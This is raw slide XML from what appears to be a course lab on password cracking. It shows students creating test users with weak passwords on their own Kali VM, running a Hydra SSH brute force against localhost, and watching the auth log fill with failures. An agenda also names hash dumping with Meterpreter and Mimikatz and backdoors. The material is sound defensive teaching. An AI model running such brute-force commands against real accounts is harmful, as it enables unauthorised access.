              </a:rPr>
              <a:t>With John the Ripper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Using Hydra to guess passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Dumping Windows Hashes with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>PSExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> exploit + Meterpreter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>And Mimikatz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Creating a Persistent backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Routing through other hosts to attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Note: This lab assumes you have completed previous labs and have access to a Windows machine, either VM or host machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>You will be making changes to user accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>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5400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Password guessing noise - demonstrated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="119878" y="916038"/>
            <a:ext cx="8572840" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Now let's see how noisy password guessing can be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Start your Kali Linux SSH server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>sudo service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> start</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>We can verify that it is running</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>service ssh status</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>nmap -n 127.0.0.1 -p 22</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Create a new user Alice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>sudo adduser alice</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Change her password to 'Passw0rd!'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>sudo passwd alice</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Open a new Terminal window</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Print the recent auth logs and follow them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>sudo tail -f /var/log/auth.log</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A153E306-0B2E-494B-903B-23E72300E5A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4637988" y="1149056"/>
            <a:ext cx="4120718" cy="2493207"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C2227C7-EB0B-49E7-941A-68AE9A0B9DA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5962650" y="3689594"/>
            <a:ext cx="2069124" cy="1383815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2743493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Password guessing noise - demonstrated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run hydra against the local machine to guess </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>alice's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ssh password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service - ssh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User - alice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the same dictionary file, lab9.lst</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As you do this, watch the log window we setup!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F694B80A-17E9-744A-9A8A-02F4AB358FF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="154113" y="3498041"/>
            <a:ext cx="8572840" cy="1156507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41189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2" y="1016836"/>
            <a:ext cx="4611189" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Spoiler ahead</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DE9F3C9-3FFB-448F-8CAD-BF5C0F5210C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spoiler!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3557830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Password guessing noise - demonstrated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>hydra -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> -P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>/share/wordlists/lab9.lst </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>://127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many system logs about failed authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is VERY OBVIOUS that someone is trying to guess the password!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DDE7685-4155-9A41-94D5-C58E3D21AA72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220999" y="1698773"/>
            <a:ext cx="6416721" cy="3258622"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2459183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Placeholder 2"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="51067"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-3175" y="-1588"/>
            <a:ext cx="44831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Password Cracking</a:t>
            </a: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7456933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Password Cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For this lab, we will create some users on our Kali VM and then try to crack their passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will use the nmap.lst wordlist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On your Kali machine, add the following users and passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>adduser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> alice </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>spongebob</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>adduser bob </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>junior56</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>adduser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>charlie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Liv3rp00l</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
